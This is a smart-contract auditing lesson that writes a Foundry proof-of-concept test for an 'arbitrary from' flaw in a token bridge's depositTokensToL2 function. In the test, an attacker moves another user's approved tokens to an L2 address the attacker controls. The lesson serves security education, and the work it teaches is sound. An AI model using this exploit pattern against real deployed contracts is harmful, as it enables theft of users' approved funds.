_Follow along with the video lesson:_ --- ### Exploit - Arbitrary From - PoC Now that we've identified an exploit in the use of an `arbitrary from` in `depositTokensToL2`, let's write a Proof of Code to demonstrate the issue. We can leverage the existing test suite to write our tests. Navigate to `L1TokenBridge.t.sol`. This test suite has a decent setup we can leverage, so our user (Alice) is configured with funds already and a vault etc has been prepped for us. Our test should just need to start with Alice, innocently approving the tokens she wants to move to L2. ```js function testCanMoveApprovedTokensOfOtherUsers() public { // poor Alice approving vm.prank(user); token.approve(address(tokenBridge), type(uint256).max); vm.stopPrank(); } ``` Now's time for Bob. We're going to set the amountToSteal to Alice's token.balanceOf and create a new attacker user to represent Bob in the transaction. We then prank the attacker. ```js uint256 amountToSteal = token.balanceOf(user); address attacker = makeAddr("attacker"); vm.prank(attacker); ``` From here, the order in which we do things in quite important. We know when `depositTokensToL2` is called that an event is emitted and at the root of this vulnerability is that this event is going to be populated with malicious data - Bob's L2 address! In order to detect an event in Foundry's test framework we can use `vm.expectEmit`. By setting `vm.expectEmit`, _then_ emitting what we expect the function to emit, **_then_** calling that function, the test suite will compare our expectations to what is actually emitted by the function. ```js vm.expectEmit(address(tokenBridge)); emit Deposit(user, attacker, amountToSteal); tokenBridge.depositTokensToL2(user, attacker, amountToSteal); ``` And finally, we can close our test off with some assertions. We can show that Bob's transaction left Alice with 0 tokens, and that those tokens are in the vault, waiting to be minting on L2 at the emitted L2 address (Bob's!) ```js assertEq(token.balanceOf(user), 0); assertEq(token.balanceOf(address(vault)), amountToSteal); vm.stopPrank(); ``` <details> <summary>testCanMoveApprovedTokensOfOtherUsers</summary> ```js function testCanMoveApprovedTokensOfOtherUsers() public { // poor Alice approving vm.prank(user); token.approve(address(tokenBridge), type(uint256).max); vm.stopPrank(); uint256 amountToSteal = token.balanceOf(user); address attacker = makeAddr("attacker"); vm.prank(attacker); vm.expectEmit(address(tokenBridge)); emit Deposit(user, attacker, amountToSteal); tokenBridge.depositTokensToL2(user, attacker, amountToSteal); assertEq(token.balanceOf(user), 0); assertEq(token.balanceOf(address(vault)), amountToSteal); vm.stopPrank(); } ``` </details> Now, we can run this test. ```bash forge test --mt testCanMoveApprovedTokensOfOtherUsers -vvv ``` ::image{src='/security-section-7/20-arbitrary-poc/arbitrary-poc1.png' style='width: 100%; height: auto;'} ### Wrap Up Boom! A proof of code demonstrating that anyone can call this function on someone elses approved tokens, stealing them on L2. Our first `High`, we found it pretty quick and `Slither` was a huge help, thanks `Slither`! Let's keep going, `Slither` had another red detector in that output... See you in the next lesson!
We detail a proof of code for our identified 'arbitrary from' vulnerability.
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